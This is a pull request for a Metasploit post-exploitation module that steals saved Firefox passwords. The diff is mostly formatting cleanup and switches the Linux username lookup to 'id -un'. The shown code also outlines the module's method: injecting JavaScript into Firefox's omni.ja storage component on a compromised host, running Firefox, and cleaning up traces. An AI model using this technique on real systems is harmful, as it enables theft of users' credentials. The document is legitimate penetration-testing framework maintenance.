### PR TITLE
Fix download of files on linux

### DIFF
--- a/modules/post/multi/gather/firefox_creds.rb
+++ b/modules/post/multi/gather/firefox_creds.rb
@@ -426,11 +426,11 @@ class Metasploit3 < Msf::Post
   def decrypt_modify_omnija(zip)
     # Which files to extract from ja/zip
     files = [
-              'components/storage-mozStorage.js',                        # stor_js
-              'chrome/toolkit/content/passwordmgr/passwordManager.xul',  # pwd_xul
-              'chrome/toolkit/content/global/commonDialog.xul',          # dlog_xul
-              'jsloader/resource/gre/components/storage-mozStorage.js'   # res_js (not 100% sure why this is used)
-            ]
+      'components/storage-mozStorage.js',                        # stor_js
+      'chrome/toolkit/content/passwordmgr/passwordManager.xul',  # pwd_xul
+      'chrome/toolkit/content/global/commonDialog.xul',          # dlog_xul
+      'jsloader/resource/gre/components/storage-mozStorage.js'   # res_js (not 100% sure why this is used)
+    ]
 
     # Extract files from zip
     arya = files.map do |omnija_file|
@@ -506,21 +506,21 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
 |
 
     regex = [
-              nil, # dirty hack alert
-              [/return\slogins;/, method_epilog],
-              [/Components\.utils\.import\("resource:\/\/gre\/modules\/XPCOMUtils\.jsm"\);/, imports]
-            ]
+      nil, # dirty hack alert
+      [/return\slogins;/, method_epilog],
+      [/Components\.utils\.import\("resource:\/\/gre\/modules\/XPCOMUtils\.jsm"\);/, imports]
+    ]
 
     # Match the last two regular expressions
     i = 2 # ...this is todo with the nil in the above regex array & regex command below
     x = i
     stor_js['content'].each_line do |line|
       # There is no real substitution if the matching regex has no corresponding patch code
-      if i != 0 and line.sub!(regex[i][0]) do |match|
-          if !regex[i][1].nil?
-            vprint_good("[#{x-i+1}/#{x}] Javascript injected - ./components/storage-mozStorage.js")
-            regex[i][1]
-          end
+      if i != 0 && line.sub!(regex[i][0]) do |match|
+        if regex[i][1]
+          vprint_good("[#{x-i+1}/#{x}] Javascript injected - ./components/storage-mozStorage.js")
+          regex[i][1]
+        end
       end # do |match|
       i -= 1
       end # if i != 0
@@ -604,7 +604,7 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
 
     # Automatic termination (window.close() - injected XUL or firefox cmd arguments)
     print_status("Starting Firefox process to get #{whoami}'s credentials")
-    cmd_exec(cmd,args)
+    cmd_exec(cmd, args)
     sleep(1)
 
     # Lets just check theres something before going forward
@@ -627,12 +627,12 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     vprint_status("Cleaning up: #{new_file}")
     file_rm(new_file)
     if session.type == "meterpreter"
-    if session.fs.file.exists?(temp_file)
-      print_error("Detected backup file (#{temp_file}) still on the target. Something went wrong.")
-    end
-    if !session.fs.file.exists?(org_file)
-      print_error("Unable to find #{org_file} on target. Something went wrong.")
-    end
+      if session.fs.file.exists?(temp_file)
+        print_error("Detected backup file (#{temp_file}) still on the target. Something went wrong.")
+      end
+      unless session.fs.file.exists?(org_file)
+        print_error("Unable to find #{org_file} on target. Something went wrong.")
+      end
     end # session.type == "meterpreter"
 
     # At this time, there should have a loot file

--- a/modules/post/multi/gather/firefox_creds.rb
+++ b/modules/post/multi/gather/firefox_creds.rb
@@ -720,6 +720,12 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
 
 
   def whoami
-    @platform == :windows ? (session.sys.config.getenv('USERNAME')) : (cmd_exec("whoami").chomp)
+    if @platform == :windows
+      id = session.sys.config.getenv('USERNAME')
+    else
+      id = cmd_exec("id -un")
+    end
+
+    id
   end
 end


### PR DESCRIPTION
Hi @g0tmi1k,

This pull request tries to fix the download of loots on Linux (DECRYPT is false) by:
- using id -un since whoami was not working
- Allow the user to configure DOWNLOAD_TIMEOUT because the default timeout for the cmd_exec("cat..") wasn't enough for big files.

Also does some first (minor) code cleanup. Do you mind to verify I didn't waste nothing and works for you? Once ready feel free to land htis PR and https://github.com/rapid7/metasploit-framework/pull/5720 will be automatically updated.
